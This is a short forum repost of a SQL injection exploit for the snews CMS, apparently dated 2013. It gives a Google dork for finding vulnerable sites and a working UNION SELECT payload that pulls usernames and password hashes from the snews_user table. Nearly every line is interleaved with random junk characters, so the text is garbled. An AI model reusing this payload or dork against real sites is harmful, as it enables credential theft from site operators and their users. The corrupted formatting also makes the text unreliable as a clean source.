标题: CMS snews SQL Injection Vulnerability
! w& o9 X; F( U8 Y! G* ~+ _作者: By onestree! R0 ]- y: y2 r' H- o& S' C
下载地址 : http://snewscms.com/7 n7 j) K+ v) Q9 S
测试平台 : ubuntu 12.10 / win 7 W# a# ?) N, }6 X7 o
关键词: inurl:"tanyakan pada rumput yang bergoyang"! U1 p% _. \0 P' I% `
8 c, @& J% V6 w% I
6 ~! e. F" B# f- J1 H& |*************************************************************
' ^# r; N- X5 G4 O! t( a
/ H' I; T/ l* e) }: WSQL poc:
" l2 u5 p$ t/ ^* H* [; F
1 f8 K, y& g8 k- v, uhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
+ |0 ]6 p e5 Q; e, W
y: H% j) |+ ~1 [示例3 d) [* D: H- P+ z! y/ H+ @ t4 _
* y) ~1 g2 G4 w5 a8 Khttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
# T; {9 K) ~5 I' W. e6 F# J; Y" d
8 s4 L) j( r9 M8 R$ T" o2 X' I 7 L6 ^ n7 I" n8 P5 V5 a& t1 `6 y
致谢:. l+ K7 X9 ^1 E% X& f+ m+ g
- A$ f3 D& z8 c
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
" F7 R4 i% F3 Z# S$ F# ~# ?
) F" }0 R5 H% h& t indonesiancoder - moeslimh4x0r - go-coder
& p# {% V- C) A! K 3 l$ ?' T9 v* |. w) _
spesial my hunny :*
- o" h! W; a2 _* ^2 q5 f- W |
发表于 2013-1-23 08:55:06
收藏
支持
反对